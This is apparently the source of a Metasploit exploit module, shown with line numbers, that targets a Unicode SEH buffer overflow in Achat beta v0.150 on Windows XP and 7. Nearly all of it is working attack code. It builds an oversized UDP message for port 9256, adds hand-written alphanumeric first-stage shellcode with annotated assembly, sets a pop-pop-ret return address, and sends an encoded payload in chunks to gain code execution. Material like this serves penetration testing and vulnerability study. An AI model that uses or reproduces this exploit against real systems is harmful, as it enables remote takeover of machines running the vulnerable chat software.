Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Udp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Achat Unicode SEH Buffer Overflow',
15
      'Description'    => %q{
16
        This module exploits a Unicode SEH buffer overflow in Achat. By
17
        sending a crafted message to the default port 9256/UDP, it's possible to overwrite the
18
        SEH handler. Even when the exploit is reliable, it depends on timing since there are
19
        two threads overflowing the stack in the same time. This module has been tested on
20
        Achat v0.150 running on Windows XP SP3 and Windows 7.
21
      },
22
      'Author'         =>
23
        [
24
          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
25
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
26
        ],
27
      'License'	       => MSF_LICENSE,
28
      'References'     =>
29
        [
30
          ['CWE', '121'],
31
        ],
32
      'DefaultOptions' =>
33
        {
34
          'EXITFUNC' => 'process'
35
        },
36
      'Payload'        =>
37
        {
38
          'DisableNops' => true,
39
          'Space'    => 730,
40
          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
41
          'StackAdjustment' => -3500,
42
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
43
          'EncoderOptions'  =>
44
            {
45
              'BufferRegister' => 'EAX'
46
            }
47
        },
48
      'Platform'       => 'win',
49
      'Targets'        =>
50
        [
51
          # Tested OK Windows XP SP3, Windows 7
52
          # Not working on Windows Server 2003
53
          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
54
        ],
55
      'Privileged'     => false,
56
      'DefaultTarget'  => 0,
57
      'DisclosureDate' => '2014-12-18'))
58

59
    register_options(
60
      [
61
        Opt::RPORT(9256)
62
      ])
63
  end
64

65
  def exploit
66
    connect_udp
67

68
    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
69
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
70
    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
71
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
72
    # 58               POP EAX                  # mov eax, ebp
73
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
74
    # 05 00140011      ADD EAX,11001400         # adjusting eax
75
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
76
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
77
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
78
    # 50               PUSH EAX                 # eax points to the start of the shellcode
79
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
80
    # 58               POP EAX                  # padding
81
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
82
    # 59               POP ECX                  # padding
83
    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
84
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
85

86
    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
87
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
88
    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
89
    sploit << "\x61\x40" # POPAD + INC EAX
90

91
    sploit << target.ret # AChat.exe p/p/r address
92

93
    # adjusting the first thread's unicode payload, tricky asm-fu
94
    # the first seh exception jumps here, first_stage variable will be executed
95
    # by the second seh exception as well. It needs to be in sync with the second
96
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
97
    # payload, then first_stage variable will take the rest of the job.
98
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
99
    # 55               PUSH EBP                 # ebp with close pointer to payload
100
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
101
    # 58               POP EAX                  # put ebp to eax
102
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
103
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
104
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
105
    # 05 00140011      ADD EAX,11001400         # more adjusting
106
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
107
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
108
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
109
    # 50               PUSH EAX			# saving eax
110
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
111
    # 5D               POP EBP			# mov ebp, eax
112
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
113
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
114
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
115
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
116
    sploit << "\x00" + 'A' * 10 + "\x00"
117

118
    i = 0
119
    while i < sploit.length do
120
      if i > 172000
121
        Rex::sleep(1.0)
122
      end
123
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
124
      i += sent
125
    end
126
    disconnect_udp
127
  end
128
end
129

130